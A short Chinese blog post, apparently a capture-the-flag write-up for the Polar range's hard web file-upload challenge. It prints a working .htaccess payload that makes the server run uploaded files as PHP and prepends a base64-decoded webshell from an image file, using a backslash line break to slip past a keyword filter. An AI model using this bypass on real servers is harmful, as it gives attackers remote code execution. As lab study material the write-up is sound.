0
点赞
收藏
分享

微信扫一扫

Polar Web【困难】上传

Polar Web【困难】上传

Contents

探索&思路&效果

进入环境

index

绕过过程

up
1
upload
2

Webshell连接

3
flag

EXP

Payload

SetHandler application/x-httpd-php
php_value auto_prepend_fi\
le "php://filter/convert.base64-decode/resource=sh.jpg"

总结

  • 作为对笔者在Polar靶场中Web方向【困难】之路的开门红… 很难说本题容易…
  • 本题以文件上传为主线
    • .htaccess 文件上传绕过的一种思路
    • php://filter/convert.base64-encode/resource= 进行文件写入
    • 反斜杠 \ 进行字符串截断并换行分割来实现字样绕过的方式







敬,不完美的明天
举报

相关推荐

0 条评论